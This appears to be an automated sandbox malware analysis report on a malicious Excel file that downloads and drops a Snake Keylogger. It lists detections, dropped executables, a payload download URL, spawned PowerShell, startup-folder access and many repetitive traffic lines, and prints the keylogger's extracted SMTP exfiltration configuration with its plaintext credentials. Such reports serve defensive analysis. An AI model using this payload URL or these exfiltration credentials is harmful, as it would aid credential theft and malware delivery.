Windows Analysis Report
DGTCkacbSz.xlsx

AV Detection

Source: DGTCkacbSz.xlsx	Avira: detected
Source: DGTCkacbSz.xlsx	Avira: detected

Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe

Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Roaming\svcost.exe

Avira: detection malicious, Label: HEUR/AGEN.1310409

Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

ReversingLabs: Detection: 68%

Source: DGTCkacbSz.xlsx

ReversingLabs: Detection: 39%

Source: C:\Users\user\AppData\Roaming\svcost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Joe Sandbox ML: detected

Source: DGTCkacbSz.xlsx

Joe Sandbox ML: detected

Compliance

Source: unknown

HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\			Jump to behavior

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then jmp 00600D90h		5_2_00600CD8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then jmp 006B0944h		5_2_006B08A8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then jmp 006B0944h		5_2_006B0B20
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then jmp 006B0944h		5_2_006B0C56
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then jmp 006FB60Bh		5_2_006FB401
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then jmp 006FB60Bh		5_2_006FB410
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		5_2_0498DB88
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C20944h		8_2_00C20898
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C20944h		8_2_00C208A8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C20944h		8_2_00C20AFE
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C20944h		8_2_00C20C56
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C2F5D0h		8_2_00C2F510
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C2F5D0h		8_2_00C2F518
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C5B60Bh		8_2_00C5B401
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00C5B60Bh		8_2_00C5B410
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		8_2_04B7DB88

Source: global traffic

DNS query: name: cia.tf

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
